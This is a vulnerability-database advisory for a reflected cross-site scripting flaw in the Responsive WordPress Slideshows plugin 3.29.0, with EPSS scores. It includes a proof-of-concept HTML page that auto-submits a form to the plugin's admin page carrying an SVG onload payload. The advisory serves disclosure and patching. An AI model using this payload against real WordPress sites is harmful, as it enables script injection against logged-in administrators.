Lucene search

K
wpexploitWpvulndbWPEX-ID:A6E6C67B-7D9B-4FDB-8115-C33ADD7BFC3D
HistoryMar 27, 2023 - 12:00 a.m.

Responsive WordPress Slideshows 3.29.0 - Reflected XSS

2023-03-2700:00:00
wpvulndb
92
wordpress
slideshows
reflected xss
admin
vulnerability
code injection
security

EPSS

0.001

Percentile

31.0%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=metaslider" method="POST">
        <input type="hidden" name="page" value='"><svg/onload=alert(/XSS/)>'/>
        <input type="submit" name="submit" value="Send" />
    </form>
  </body>
</html>

EPSS

0.001

Percentile

31.0%

Related for WPEX-ID:A6E6C67B-7D9B-4FDB-8115-C33ADD7BFC3D